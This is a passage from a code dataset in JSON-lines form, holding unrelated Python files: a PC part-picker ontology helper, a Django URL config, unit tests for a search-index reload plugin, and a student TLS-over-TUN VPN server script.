get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\t# sync_reasoner()\n\n\t# special for memory\n\tif obo[class_id] == None or 'Memory' in str(obo[class_id].is_a[0]): # memory\n\t# if 'Memory' in str(obo[class_id].is_a[0]): # memory\n\t\treturn [obo.Memory(class_id)]\n\telse:\n\t\t# return [obo[class_id]]\n\t\tindivs = []\n\t\tfor i in obo[class_id].instances(): # only has bottom level indivs\n\t\t\tif str(i)[0] != 'x': \n\t\t\t\tprint(\"indiv: %s\", i)\n\t\t\t\tindivs.append(i)\n\t\treturn(indivs)\n\ndef get_obo_elem(elem_id):\n\tonto = None\n\tif is_debug:\n\t\tonto = get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\t# sync_reasoner()\n\treturn obo[elem_id]\n\ndef save_computer(comp_name, parts):\n\tonto = None\n\tif is_debug:\n\t\tonto = get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\t# make the computer\n\tobo_parts = []\n\tfor x in parts:\n\t\tobo_part = onto.search(iri = \"*\" + x)\n\t\tif len(obo_part) > 0:\n\t\t\tobo_parts.append(obo_part[0])\n\tnew_computer = obo.Computer(comp_name, namespace = onto, hasPart = obo_parts)\n\tonto.save(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\")\n\treturn new_computer\n\ndef recur_find_parent(cur_parent, possib_parents):\n\tif cur_parent is None or cur_parent == []:\n\t\treturn None\n\telse:\n\t\tif hasattr(cur_parent, \"is_a\"):\n\t\t\tparents = []\n\t\t\tfor new_parent in cur_parent.is_a: # is one of our direct parents a match?\n\t\t\t\tif hasattr(new_parent, \"name\"):\n\t\t\t\t\tnew_parent_name = new_parent.name\n\t\t\t\t\tfor par in possib_parents:\n\t\t\t\t\t\tif par == new_parent_name: # we have a match\n\t\t\t\t\t\t\treturn par\n\t\t\t\t\t\telif par == 'Motherboard' and par in new_parent_name: # mobo is a bit special\n\t\t\t\t\t\t\treturn par\n\t\t\t\tparents.append(recur_find_parent(new_parent, possib_parents))\n\t\t\tfor parent in parents:\n\t\t\t\tif parent in possib_parents:\n\t\t\t\t\treturn parent # keep going\n\t\t\n\ndef find_missing_parts(comp_name):\n\tonto = None\n\tif is_debug:\n\t\tonto = get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\tall_parts = get_subclasses_onelevel('RDpBs6DXJfwjWljvKnjFFK7')\n\tcomp_parts = onto.search(iri = \"*\" + comp_name)[0].hasPart\n\tcomp_has = []\n\tfor part in comp_parts:\n\t\tcomp_has.append(recur_find_parent(part, all_parts))\n\t# now get the diff \n\tcomp_needs = list(set(all_parts) - set(comp_has))\n\treturn comp_needs\n\n\n\n\n\t\n\n\n\n\n\n\n\n","repo_name":"JacobusH/IntelligentAgents","sub_path":"partPicker.py","file_name":"partPicker.py","file_ext":"py","file_size_in_byte":5421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72762632554","text":"from django.conf.urls import patterns, include, url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.rate_list, name='list'),\n url(r'^(?P\\d+)/$', views.rate_as_field, name='as_field'),\n url(r'^suggestions/$', views.suggestions, name='suggestions'),\n url(r'^create/$', views.create_rate, name='create'),\n #url(r'^user_rate/(?P[\\w\\s@+.-]+)/$', views.edit_user_rate, name='edit_user_rate'),\n url(r'^(?P\\d+)/edit/$', views.edit_rate, name='edit'),\n url(r'^(?P\\d+)/delete/$', views.delete_rate, name='delete'),\n]\n","repo_name":"ExpoPythonist/ProveBanking__s","sub_path":"apps/rates/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"443717319","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport json\nimport os\nimport re\nimport shutil\nimport time\nimport unittest\nfrom collections import namedtuple\nfrom six.moves.configparser import ConfigParser\n\nimport context\nfrom context import get_plugin_path, get_plugins_dir_path\nfrom pyb.plugin import marketsearch\nfrom pyb.taskrunner import TaskRunner\nfrom pyb import report_config\nfrom .common import DummyTaskRunner, symlink, dist_names_test1_test2 # noqa\n\nfrom market.pylibrary.mi_util import util\nfrom async_publishing.group_config import GroupConfig\n\nfrom mock import Mock, patch\nimport pytest\n\n\ndef assert_not_called_with(self, *args, **kwargs):\n try:\n self.assert_called_with(*args, **kwargs)\n except AssertionError:\n return\n raise AssertionError('Expected %s to not have been called.' % self._format_mock_call_signature(args, kwargs))\n\n\nMock.assert_not_called_with = assert_not_called_with\n\n\nclass TimeoutException(Exception):\n pass\n\n\nclass Test(unittest.TestCase):\n _genlogs = ['20130920_1300', '20130920_1400', '20130920_1500', '20130920_1600', '20130920_1700']\n _dists = ['test1', 'test2', 'report-data']\n\n @pytest.fixture(scope='class', autouse=True)\n def patch_async_publishing_client(self):\n class Client:\n @property\n def my_group_config(self):\n json_config = {\n 'simultaneous_restart': None,\n 'failures_threshold': None,\n 'hosts': {\n \"1\": [\n {'key': 'rtc-123', 'fqdn': 'rtc-123.market.yandex.net', 'port': 17051, 'datacenter': None},\n ],\n \"2\": [\n {'key': 'rtc-321', 'fqdn': 'rtc-321.market.yandex.net', 'port': 17051, 'datacenter': None},\n ]\n }\n }\n return GroupConfig.from_str(json.dumps(json_config))\n\n with patch('pyb.plugin.marketsearch.AsyncPublishingClient', return_value=Client()):\n yield\n\n @pytest.fixture(scope='class', autouse=True)\n def patch_zk_client(self):\n with patch('pyb.zk.create_zk_client'):\n yield\n\n @pytest.fixture(scope='class', autouse=True)\n def patch_reload_lock_path(self):\n with patch('pyb.plugin.marketsearch.MarketSearch.get_reload_lock_path', return_value='reload.lock'):\n yield\n\n def _list_generations(self, directory):\n return [gen for gen in os.listdir(directory) if gen in self._genlogs]\n\n def setUp(self):\n self._src_dir = context.MARKETSEARCH_DATA_DIR\n self._work_dir = os.path.join(os.getcwd(), context.TMP_DIR, 'base_test')\n self._stub_dir = os.path.join(context.MARKETSEARCH_DATA_DIR, 'stub.py')\n self._clean()\n\n def tearDown(self):\n self._clean()\n\n @property\n def _dists_dir(self):\n return os.path.join(self._work_dir, 'dists')\n\n @property\n def _genlogs_dir(self):\n return os.path.join(self._work_dir, 'marketsearch')\n\n def _clean(self):\n shutil.rmtree(self._work_dir, ignore_errors=True)\n\n def _make_stubs(self):\n paths = [\n '/usr/bin/torrent_client_clt',\n '/usr/bin/sky_downloader',\n ]\n for path in paths:\n symlink(self._stub_dir, self._work_dir + path)\n\n def _prepare(self):\n self._clean()\n\n util.makedirs(self._work_dir)\n util.makedirs(self._dists_dir)\n util.makedirs(self._genlogs_dir)\n\n confs = ['marketsearch2.conf', 'marketsearch2_1.conf']\n for conf in confs:\n ptpl = os.path.join(self._src_dir, conf + '.tpl')\n with open(ptpl) as f:\n content = f.read()\n pconf = os.path.join(self._work_dir, conf)\n with open(pconf, 'w') as f:\n f.write(content.replace('%%WORKDIR%%', self._work_dir))\n\n files = ['httpsearch', 'checksearch', 'checksearch_fail', 'generate',\n 'timetail', 'preport.log', 'httpsearch_list']\n for file in files:\n src = os.path.join(self._src_dir, file)\n dst = os.path.join(self._work_dir, file)\n shutil.copy(src, dst)\n\n for genlog in self._genlogs:\n for dist in self._dists:\n path = os.path.join(self._work_dir, 'marketsearch', genlog, dist)\n util.makedirs(path)\n with open(os.path.join(path, 'completed'), 'w'):\n pass\n\n self._make_stubs()\n\n def _get_log_lines(self):\n with open(os.path.join(self._work_dir, 'marketsearch.log')) as f:\n return [v.strip() for v in f.readlines()]\n\n def _create(self, p_config, reports, experimental_unpack=False):\n dists = {}\n\n for dist in self._dists:\n dists[dist] = os.path.join(self._dists_dir, dist)\n\n class Context(object):\n def __init__(self, root_dir):\n self.name = os.path.basename(p_config)[:-len('.conf')]\n self.root_dir = root_dir\n self.task_runner = TaskRunner(root_dir)\n self.aria2_user = context.user_name()\n self.prefix_dir = None\n self.torrent_client = root_dir + '/usr/bin/torrent_client_clt'\n self.torrent_client_config = None\n self.sky_downloader_client = root_dir + '/usr/bin/sky_downloader'\n self.sky_downloader_client_config = None\n self.plugins_dir = os.path.dirname(p_config)\n self.backctld_port = None\n self.dists = dists\n self.experiment_flags_reader = None\n\n def get_path(self, path):\n return path\n\n ms = marketsearch.MarketSearch(Context(self._work_dir), plugin_config_path=p_config)\n ms._trunner = DummyTaskRunner()\n ms._config.httpsearch_list_path = os.path.join(self._work_dir, 'httpsearch_list')\n ms._r_supported = set(reports)\n ms._config.experimental_unpack = experimental_unpack\n return ms\n\n def _wait(self, ms, time_to_wait=30):\n start = time.time()\n retval = ms.check()\n while retval == '! in progress':\n # wait fot 30 seconds\n if time.time() > start + time_to_wait:\n raise TimeoutException()\n time.sleep(0.1)\n retval = ms.check()\n\n return retval\n\n def _check_structure(self, gen):\n dirs = os.listdir(self._dists_dir)\n self.assertEqual(set(dirs), set(self._dists))\n for dist in self._dists:\n src = os.path.join(self._dists_dir, dist)\n self.assertTrue(os.path.islink(src))\n dstreal = os.readlink(src)\n dstexp = os.path.join(self._work_dir, 'marketsearch', gen, dist)\n self.assertEqual(dstreal, dstexp)\n\n def test_all(self, experimental_unpack=False):\n self._prepare()\n\n p_config = os.path.join(self._work_dir, 'marketsearch2.conf')\n gen = '20130920_1600'\n saved_gens = [gen, '20130920_1700']\n reports = ['test1', 'test2', 'test3']\n\n # reload + check test\n # check if reload creates right dirs/links structure\n # ! there is no test when we put dists to shared memory\n ms = self._create(p_config, reports, experimental_unpack=experimental_unpack)\n ms.reload(gen)\n\n self.assertEquals(self._wait(ms), 'ok')\n self.assertEquals('! false', ms.is_reloading())\n\n self._check_structure(gen)\n\n dirs = self._list_generations(self._genlogs_dir)\n self.assertEqual(sorted(dirs), sorted(saved_gens))\n\n # test if ReloadLaucher generates report config\n with open('generated.cfg') as f:\n lines = [v.strip() for v in f.readlines()]\n self.assertEqual(lines, reports)\n\n # test if stop, start and check are called in right order and for all reports\n lines = self._get_log_lines()\n self.assertTrue(len(lines) >= 9)\n\n def check_lines(beg, end, irep, ok):\n processed = set()\n for i in range(beg, end):\n args = lines[i].split(' ')\n self.assertTrue(ok(args))\n processed.add(args[irep])\n if irep >= 0:\n self.assertEqual(set(reports), processed)\n\n check_lines(0, 3, 2, lambda a: len(a) == 3 and a[0] == 'httpsearch' and a[1] == 'close-for-load')\n check_lines(3, 6, 2, lambda a: len(a) == 3 and a[0] == 'httpsearch' and a[1] == 'stop')\n check_lines(6, 9, 2, lambda a: len(a) == 3 and a[0] == 'httpsearch' and a[1] == 'start')\n check_lines(9, 12, -1, lambda a: len(a) == 3 and a[0] == 'httpsearch' and a[1] == 'status')\n check_lines(12, 15, 1, lambda a: len(a) >= 2 and a[0] == 'checksearch')\n\n # rm_inactive_gens test\n src = os.path.join(self._work_dir, 'marketsearch', gen)\n dst = os.path.join(self._work_dir, 'report_data')\n os.symlink(src, dst)\n for genlog in self._genlogs:\n path = os.path.join(self._work_dir, 'marketsearch', genlog)\n if not os.path.exists(path):\n util.makedirs(path)\n\n retval = ms.rm_inactive_gens()\n self.assertEqual(retval, 'ok')\n generations = self._list_generations(self._genlogs_dir)\n self.assertEqual(sorted(generations), sorted(saved_gens))\n\n def test_all_experimental_unpack(self):\n return self.test_all(experimental_unpack=True)\n\n @pytest.mark.usefixtures('dist_names_test1_test2')\n def test_get_downloaded_generations(self):\n self._prepare()\n\n p_config = os.path.join(self._work_dir, 'marketsearch2.conf')\n ms = self._create(p_config, ['test1'])\n\n # make 20130920_1500 generation incomplete (no \"completed\" file)\n os.remove(os.path.join(self._work_dir, 'marketsearch', '20130920_1500', 'test2', 'completed'))\n self.assertEqual(ms.get_downloaded_generations(), '20130920_1700,20130920_1600,20130920_1400,20130920_1300')\n\n # make 20130920_1400 generation incomplete (missing directory for a dist)\n shutil.rmtree(os.path.join(self._work_dir, 'marketsearch', '20130920_1400', 'test2'))\n self.assertEqual(ms.get_downloaded_generations(), '20130920_1700,20130920_1600,20130920_1300')\n\n def test_reload_choose_gen(self):\n self._prepare()\n\n p_config = os.path.join(self._work_dir, 'marketsearch2.conf')\n ms = self._create(p_config, ['test1'])\n ms.reload()\n self.assertEquals(self._wait(ms), 'ok')\n self._check_structure(self._genlogs[-1])\n\n def test_reload_error(self):\n self._prepare()\n for genlog in self._genlogs:\n dir = os.path.join(self._genlogs_dir, genlog)\n shutil.rmtree(dir, ignore_errors=True)\n p_config = os.path.join(self._work_dir, 'marketsearch2.conf')\n ms = self._create(p_config, ['test1'])\n ms.reload()\n self.assertTrue(self._wait(ms).startswith('! failed'))\n self.assertEqual(ms._trunner.get(ms._name).result, \"can't get generation for reload\")\n\n def test_unpack_reload(self):\n self._prepare()\n p_config = os.path.join(self._work_dir, 'marketsearch2.conf')\n ms = self._create(p_config, ['test1'])\n ms.unpack_reload(None, None)\n self.assertEquals(self._wait(ms), 'ok')\n\n def test_generation_fqdn_config(self):\n self._prepare()\n p_config = os.path.join(self._work_dir, 'marketsearch2.conf')\n ms = self._create(p_config, ['test1'])\n ms.restart()\n self.assertEquals(self._wait(ms), 'ok')\n fqdn_config_path = os.path.join(self._work_dir, 'fqdn.json')\n with open(fqdn_config_path) as fqdn_config_file:\n fqdn_json = json.load(fqdn_config_file)\n self.assertEqual(fqdn_json, {'rtc-123': 'rtc-123.market.yandex.net', 'rtc-321': 'rtc-321.market.yandex.net'})\n\n\nclass SimpleTest(unittest.TestCase):\n def test_calc_gens_to_save(self):\n calc = marketsearch.calc_gens_to_save\n\n self.assertEquals(calc([3, 2, 1], [], num_to_save=1), [3])\n self.assertEquals(calc([3, 2, 1], [], num_to_save=2), [3, 2])\n\n self.assertEquals(calc([3, 2, 1], [1], num_to_save=1), [1])\n self.assertEquals(calc([3, 2, 1], [1], num_to_save=2), [1, 3])\n self.assertEquals(calc([3, 2, 1], [1], num_to_save=3), [1, 3, 2])\n self.assertEquals(calc([3, 2, 1], [1], num_to_save=4), [1, 3, 2])\n\n self.assertEquals(calc([3, 2, 1], [1, 2], num_to_save=1), [1, 2])\n\n self.assertEquals(calc([3, 2, 1], white_list=[1, 1], num_to_save=2), [1, 3])\n\n def test_stamp_to_date(self):\n date_short = util.stamp_to_datetime('20161230_1300')\n self.assertEqual(date_short, datetime.datetime(2016, 12, 30, 13, 0))\n date_long = util.stamp_to_datetime('20161230_130015')\n self.assertEqual(date_long, datetime.datetime(2016, 12, 30, 13, 0, 15))\n\n\nclass ConfigsConsistencyTest(unittest.TestCase):\n def test_marketsearch_snippet(self):\n def get_dists_count(pattern, config):\n return len([name for name, _ in config.items('dists') if re.match(pattern, name) is not None])\n\n marketsearch = ConfigParser()\n marketsearch.read(get_plugin_path('marketsearch3.conf'))\n\n snippet = ConfigParser()\n snippet.read(get_plugin_path('marketsearchsnippet.conf'))\n\n self.assertEqual(get_dists_count(r'search-part-\\d+', marketsearch), get_dists_count(r'search-snippet-\\d+', snippet))\n self.assertEqual(1, get_dists_count('search-snippet-data', snippet))\n\n\nclass IptrulerTest(unittest.TestCase):\n def test(self):\n \"\"\"Проверяем Report\n close_iptruler\n open_iptruler\n \"\"\"\n def check(reportname):\n class Iptruler(object):\n port_down = None\n port_up = None\n\n def down(self, port):\n self.port_down = port\n\n def up(self, port):\n self.port_up = port\n\n report = marketsearch.create_report(reportname)\n iptruler = Iptruler()\n\n logger_mock = Mock()\n system_ex_mock = Mock(return_value=0)\n with patch('market.pylibrary.mi_util.util.watching_system_ex', system_ex_mock):\n with patch('logging.getLogger', Mock(return_value=logger_mock)):\n report.close_iptruler('/etc/init.d/mockhttpsearch', iptruler)\n\n system_ex_mock.assert_called_with(['/etc/init.d/mockhttpsearch', 'close-for-load', reportname])\n self.assertEquals(logger_mock.info.called, 1)\n self.assertEquals(logger_mock.error.called, 0)\n\n report.open_iptruler('/etc/init.d/mockhttpsearch', iptruler)\n\n system_ex_mock.assert_called_with(['/etc/init.d/mockhttpsearch', 'open-for-load', reportname])\n self.assertEquals(logger_mock.info.called, 1)\n self.assertEquals(logger_mock.error.called, 0)\n\n self.assertEqual(iptruler.port_down, iptruler.port_up)\n\n check('market-report')\n check('market-parallel-report')\n check('market-ppcshop-report')\n check('market-snippet-report')\n\n def test_fail_to_change_report_state(self):\n \"\"\"\n Проверяем, что при неудачной попытке поменять состояние репорта:\n 1. Iptruler все равно делает свою работу\n 2. Сообщение об этой неудачной попытке попадает в error log\n \"\"\"\n report = marketsearch.create_report('market-report')\n\n iptruler_mock = Mock()\n logger_mock = Mock()\n system_ex_mock = Mock(return_value=1)\n with patch('market.pylibrary.mi_util.util.watching_system_ex', system_ex_mock):\n with patch('logging.getLogger', Mock(return_value=logger_mock)):\n report.close_iptruler('/etc/init.d/mockhttpsearch', iptruler_mock)\n\n iptruler_mock.down.assert_called_with(17051)\n system_ex_mock.assert_called_with(['/etc/init.d/mockhttpsearch', 'close-for-load', 'market-report'])\n self.assertEquals(logger_mock.error.called, 1)\n self.assertEquals(logger_mock.info.called, 0)\n\n report.open_iptruler('/etc/init.d/mockhttpsearch', iptruler_mock)\n\n iptruler_mock.up.assert_called_with(17051)\n system_ex_mock.assert_called_with(['/etc/init.d/mockhttpsearch', 'open-for-load', 'market-report'])\n self.assertEquals(logger_mock.error.called, 1)\n self.assertEquals(logger_mock.info.called, 0)\n\n\nclass ReloadTest(unittest.TestCase):\n def setUp(self, ):\n self._work_dir = os.path.join(os.getcwd(), context.TMP_DIR, 'reload_test')\n util.makedirs(self._work_dir)\n\n marketsearch3 = marketsearch.Config(get_plugin_path('marketsearch3.conf'), self._work_dir, 'user')\n marketsearch3.reportconf_gen = 'reportconf_gen'\n marketsearch3.mini_tank = 'mini_tank'\n self.marketsearch3 = marketsearch3\n\n plugins_dir = get_plugins_dir_path()\n prefix_dir = str(self._work_dir)\n\n DummyContext = namedtuple('DummyContext', 'config, full_config, plugins_dir, prefix_dir')\n self.context = DummyContext(marketsearch3, marketsearch3, plugins_dir, prefix_dir)\n\n report_config.SERVANTS_FILE = os.path.join(context.MARKETSEARCH_DATA_DIR, 'httpsearch_list')\n DummyServantConfig = namedtuple('ServantConfig', ['market_report', 'server', 'collections'])\n self.dummy_servant_config = DummyServantConfig(\n market_report={},\n server={'Port': '17051'},\n collections={\n 'basesearch16-0': {},\n 'basesearch16-8': {},\n }\n )\n self.servant_config_patcher = patch(\n 'pyb.report_config.read_servant_config',\n return_value=self.dummy_servant_config\n )\n self.servant_config_patcher.start()\n Responce = namedtuple('Responce', ['status_code', 'text'])\n self.requests_get_patcher = patch(\n 'requests.get',\n return_value=Responce(200, 'ok')\n )\n self.get_mock = self.requests_get_patcher.start()\n self.watched_system_ex_patcher = patch('market.pylibrary.mi_util.util.watching_system_ex', return_value=0)\n self.watched_system_ex_mock = self.watched_system_ex_patcher.start()\n\n def tearDown(self):\n shutil.rmtree(self._work_dir, ignore_errors=True)\n self.watched_system_ex_patcher.stop()\n self.servant_config_patcher.stop()\n self.requests_get_patcher.stop()\n\n def _launcher(self, name, context=None, downloading_generations=None, open_for_load=True):\n if context is None:\n context = self.context\n\n if downloading_generations is None:\n downloading_generations = []\n\n launcher = marketsearch.DefaultReloadLauncher(\n self.context,\n name,\n downloading_generations,\n ['market-report'],\n open_for_load)\n # не пытаемся стартовать репорт на самом деле\n launcher._start_httpsearch_sync = lambda t: None\n launcher._update_quick_data = lambda: None\n return launcher\n\n def _set_current_generation(self, config, name):\n root_dir = os.path.join(self._work_dir, 'var/lib/search/')\n download_dir = os.path.join(root_dir, config.download_dir)\n util.makedirs(download_dir)\n util.atomic_write(os.path.join(download_dir, 'current.generation'), name)\n\n def _make_base_gen(self, name, published=False, additional_files=None, creation_time=None, meta=False):\n additional_files = additional_files or []\n root_dir = os.path.join(self._work_dir, 'var/lib/search/')\n for dist_name, dist_dir in self._dists(root_dir, self.marketsearch3, name, published=published):\n if (not meta and '-meta-' in dist_name) or (meta and '-meta-' not in dist_name):\n continue\n util.makedirs(dist_dir)\n self._create_file(os.path.join(dist_dir, 'content'), 'full ' + name, creation_time)\n\n if dist_name in ('search-report-data', 'search-meta-report-data'):\n backends_dir = os.path.join(dist_dir, 'backends')\n util.makedirs(backends_dir)\n self._create_file(os.path.join(backends_dir, 'content'), 'full ' + name, creation_time)\n if dist_name.startswith('search-part-'):\n qbids_generatioin = os.path.join(dist_dir, 'market_qbids.generation')\n self._create_file(qbids_generatioin, name + '00', creation_time)\n for file in additional_files:\n self._create_file(os.path.join(root_dir, file), 'full ' + name, creation_time)\n if published:\n self._set_current_generation(self.marketsearch3, name)\n if not published and creation_time is not None:\n generation_path = os.path.join(root_dir, self.marketsearch3.download_dir, name)\n self._set_mtime(generation_path, creation_time)\n\n def _dists(self, root_dir, config, generation_name, published=False):\n if published:\n for name, rel_path in config.dists:\n dist_path = os.path.join(root_dir, rel_path)\n yield name, dist_path\n else:\n for name, rel_path in config.dists:\n download_dir = os.path.join(root_dir, config.download_dir)\n yield name, os.path.join(download_dir, generation_name, name, '{}-{}'.format(name, generation_name))\n\n @staticmethod\n def _set_mtime(path, ts):\n os.utime(path, (ts, ts))\n\n @classmethod\n def _create_file(cls, path, content, creation_time=None):\n util.atomic_write(path, content)\n if creation_time is not None:\n cls._set_mtime(path, creation_time)\n\n def _get_generation_path(self, generation_name):\n root_dir = os.path.join(self._work_dir, 'var/lib/search/')\n return os.path.join(root_dir, self.marketsearch3.download_dir, generation_name)\n\n @property\n def _current_generation(self):\n root_dir = os.path.join(self._work_dir, 'var/lib/search/')\n current_full_path = os.path.join(root_dir, self.marketsearch3.download_dir, 'current.generation')\n return util.get_file_value(current_full_path)\n\n def test_not_published_gen(self):\n self._make_base_gen('20170320_1000')\n self._launcher('20170320_1000')\n self.assertEqual('', self._current_generation)\n\n def test_reload_full(self):\n old_gen_path = self._get_generation_path('20100101_0001')\n\n self._make_base_gen('20100101_0001', creation_time=1262329200)\n self._make_base_gen('20170320_0900')\n self._make_base_gen('20170320_1000', published=True)\n self._make_base_gen('20170320_1100')\n self.assertEqual('20170320_1000', self._current_generation)\n self.assertFalse(self.get_mock.called)\n self.assertTrue(os.path.exists(old_gen_path))\n\n launcher = self._launcher('20170320_1100', downloading_generations=['20100101_0001'])\n launcher.launch(0)\n\n self.assertEqual('20170320_1100', self._current_generation)\n # проверяем, что очень старое так и не скачавшееся поколение 20100101_0001 было удалено\n self.assertFalse(os.path.exists(old_gen_path))\n # открываемся от балансера после релода full\n httpsearch_cmd = os.path.join(self._work_dir, 'etc/init.d/httpsearch')\n self.watched_system_ex_mock.assert_any_call([httpsearch_cmd, 'open-for-load', 'market-report'])\n\n def test_reload_closed(self):\n\n self._make_base_gen('20100101_0001', creation_time=1262329200)\n self._make_base_gen('20170320_1000', published=True)\n self._make_base_gen('20170320_1100')\n self.assertEqual('20170320_1000', self._current_generation)\n self.assertFalse(self.get_mock.called)\n\n launcher = self._launcher('20170320_1100', downloading_generations=['20100101_0001'], open_for_load=False)\n launcher.launch(0)\n\n self.assertEqual('20170320_1100', self._current_generation)\n # не открываемся от балансера, если не указано обратного\n httpsearch_cmd = os.path.join(self._work_dir, 'etc/init.d/httpsearch')\n self.watched_system_ex_mock.assert_not_called_with([httpsearch_cmd, 'open-for-load', 'market-report'])\n\n def test_reload_meta(self):\n old_gen_path = self._get_generation_path('20200101_0001')\n\n self._make_base_gen('20200101_0001', creation_time=1262329200, meta=True)\n self._make_base_gen('20270320_0900', meta=True)\n self._make_base_gen('20270320_1000', published=True, meta=True)\n self._make_base_gen('20270320_1100', meta=True)\n self.assertEqual('20270320_1000', self._current_generation)\n self.assertFalse(self.get_mock.called)\n self.assertTrue(os.path.exists(old_gen_path))\n\n launcher = self._launcher('20270320_1100', downloading_generations=['20200101_0001'])\n launcher.launch(0)\n\n self.assertEqual('20270320_1100', self._current_generation)\n # проверяем, что очень старое так и не скачавшееся поколение 20200101_0001 было удалено\n self.assertFalse(os.path.exists(old_gen_path))\n # открываемся от балансера после релода full\n httpsearch_cmd = os.path.join(self._work_dir, 'etc/init.d/httpsearch')\n self.watched_system_ex_mock.assert_any_call([httpsearch_cmd, 'open-for-load', 'market-report'])\n\n def test_keep_very_old_generations(self):\n \"\"\" В тесте проверяем, что старые поколения не будут удалены, если лимит\n по количеству хранимых поколений не превышен.\n\n * old_gen – это очень старое поколение, оно сейчас используется. А еще оно в 10 раз старше,\n чем позволяет трешолд TOO_OLD_DOWNLOADING_GENERATION_S.\n * new_gen – новое поколение, которое только скачалось, на него будет выполнен релоад.\n \"\"\"\n\n now_ts = time.time()\n old_ts = now_ts - 10 * marketsearch.DefaultReloadLauncher.TOO_OLD_DOWNLOADING_GENERATION_S\n old_gen = '20210101_0100'\n new_gen = '20210301_0200'\n old_gen_path = self._get_generation_path(old_gen)\n new_gen_path = self._get_generation_path(new_gen)\n\n self._make_base_gen(old_gen, creation_time=old_ts)\n self._make_base_gen(old_gen, published=True)\n self._make_base_gen(new_gen, creation_time=now_ts)\n\n # оба поколения присутствуют на диске\n self.assertTrue(os.path.exists(old_gen_path))\n self.assertTrue(os.path.exists(new_gen_path))\n\n # релоад на new_gen\n launcher = self._launcher(new_gen)\n launcher.launch(0)\n\n # после релоада старое поколение не было удалено\n self.assertTrue(os.path.exists(old_gen_path))\n self.assertTrue(os.path.exists(new_gen_path))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/tests/test_marketsearch.py","file_name":"test_marketsearch.py","file_ext":"py","file_size_in_byte":27686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5509310204","text":"#!/usr/bin/env python3\nimport ssl\n\nfrom scapy.all import *\nimport fcntl\nimport struct\nimport os\nimport time\n\nfrom scapy.layers.inet import IP\n\n# TUN interface\nTUNSETIFF = 0x400454ca\nIFF_TUN = 0x0001\nIFF_TAP = 0x0002\nIFF_NO_PI = 0x1000\n\n# Create the tun interface\ntun = os.open(\"/dev/net/tun\", os.O_RDWR)\nifr = struct.pack('16sH', b'sen%d', IFF_TUN | IFF_NO_PI)\nifname_bytes = fcntl.ioctl(tun, TUNSETIFF, ifr)\n\n# Get the interface name\nifname = ifname_bytes.decode('UTF-8')[:16].strip(\"\\x00\")\nprint(\"Interface Name: {}\".format(ifname))\n\n# Configure the tun interface\nos.system(\"ip addr add 192.168.53.11/24 dev {}\".format(ifname))\nos.system(\"ip link set dev {} up\".format(ifname))\n\n\n# UDP server\nIP_A = '0.0.0.0'\nPORT = 9090\n\n# Set context\ncertFile = './certs/server.crt'\nkeyFile = './certs/server.key'\ncontext = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)\ncontext.load_cert_chain(certfile=certFile, keyfile=keyFile)\n\n# Setup TCP socket\nsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntimeout = 2\nsocket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVTIMEO, timeout)\nsocket.bind((IP_A, PORT))\nsocket.listen(5)\n\n# We assume that sock and tun file descriptors have already been created.\nip, port = \"10.9.0.5\", 12345\n\n\ndef deal_with_client(secure_sock):\n\twhile True:\n\t\t# this will block until at least one interface is ready\n\t\tprint(\"waiting for ready\")\n\t\tready, _, _ = select.select([secure_sock, tun], [], [])\n\n\t\tfor fd in ready:\n\t\t\tprint(\"fd\", fd)\n\t\t\tif fd is secure_sock:\n\t\t\t\tprint(\"wait\")\n\t\t\t\t#data, (ip, port) = secure_sock.recv(2048)\n\t\t\t\tdata = secure_sock.recv(2048)\n\t\t\t\tprint(\"received:\", data)\n\t\t\t\tpkt = IP(data)\n\t\t\t\ttcp = TCP(sport=1234, dport=80, flags=\"S\", seq=1)\n\t\t\t\tpkt = pkt / tcp\n\t\t\t\tprint(\"packet:\", pkt)\n\t\t\t\tprint(\"From socket <==: {} --> {}\".format(pkt.src, pkt.dst))\n\t\t\t\tos.write(tun, bytes(pkt))\n\t\t\t\tprint(\"has written to tun\")\n\t\t\tif fd is tun:\n\t\t\t\tprint(\"waiting for tun\")\n\t\t\t\tpacket = os.read(tun, 2048)\n\t\t\t\tpkt = IP(packet)\n\t\t\t\tprint(\"From tun ==>: {} --> {}\".format(pkt.src, pkt.dst))\n\t\t\t\t#secure_sock.sendto(packet, (ip, port))\n\t\t\t\tsecure_sock.sendall(packet)\n\n\n\nwhile True:\n\tnewSocket, fromIP = socket.accept()\n\t# wrap the socket in a TLS/SSL layer\n\tsecure_sock = context.wrap_socket(newSocket, server_side=True)\n\ttry:\n\t\tdeal_with_client(secure_sock)\n\texcept Exception as e:\n\t\tprint(\"excetion:\", e)","repo_name":"nielsbjorn-da/SS2023","sub_path":"Assignment 2/TLS 